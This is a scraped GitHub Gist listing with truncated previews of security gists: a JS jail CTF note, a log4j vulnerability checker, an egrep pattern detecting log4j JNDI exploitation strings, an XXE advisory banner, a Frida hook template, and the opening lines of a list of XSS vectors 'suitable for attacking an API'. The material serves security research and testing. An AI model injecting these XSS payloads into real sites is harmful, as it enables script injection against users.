Simple JS Jail challenge.
It is run on context, so we have nothing but to play with constructor and console.
1337 === eval(our_input)
Abdillah Hasny abdilahrf
honoki
/ hackerone-initiate-programs.sh
Last active
September 18, 2023 18:56
Create new BBRF programs from your private and public HackerOne programs.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Initiate new BBRF programs from your public and private HackerOne programs | |
| h1name="<your-hackerone-username>" | |
| apitoken="<your-hackerone-api-token>" | |
| next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100' | |
| while [ "$next" ]; do |
byt3bl33d3r
/ log4j_rce_check.py
Created
December 10, 2021 06:02
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python3 | |
| ''' | |
| Needs Requests (pip3 install requests) | |
| Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
| License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License) | |
| This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. |
evanscottgray
/ docker_kill.sh
Last active
November 7, 2023 03:40
kill all docker containers at once...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt |
zeropwn
/ Axway SecureTransport 5.x Unauthenticated XXE
Last active
November 17, 2023 08:59
Axway SecureTransport 5.x Unauthenticated XML Injection / XXE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _ _ | |
| _______ _ __ ___ | | ___ | | | |
| |_ / _ \ '__/ _ \ | |/ _ \| | | |
| / / __/ | | (_) || | (_) | | | |
| /___\___|_| \___(_)_|\___/|_| | |
| https://zero.lol | |
| zero days 4 days | |
| ATTENTION: |
mhmdiaa
/ waybackrobots.py
Last active
November 22, 2023 12:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| import sys | |
| from multiprocessing.dummy import Pool | |
| def robots(host): | |
| r = requests.get( | |
| 'https://web.archive.org/cdx/search/cdx\ | |
| ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
Neo23x0
/ log4j_rce_detection.md
Last active
January 28, 2024 08:19
Log4j RCE CVE-2021-44228 Exploitation Detection
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Android native hooks By @709924470 | |
| // CC-BY-NC 4.0 | |
| var moduleName = "libmain.so"; // Module name gose here | |
| var hookFunctions = [ | |
| { | |
| name: "Java_com_example_hellojni_getstr", // Function name goes here | |
| onEnter: function(args){ | |
| // TODO: your code here | |
| }, | |
| onLeave: function(ret){ |
xynova
/ Enable WSL and Ubuntu 16.04 on Windows 10.md
Last active
February 14, 2024 01:13
Enable WSL and Ubuntu 16.04 on Windows 10
References:
JohannesHoppe
/ 666_lines_of_XSS_vectors.html
Created
May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |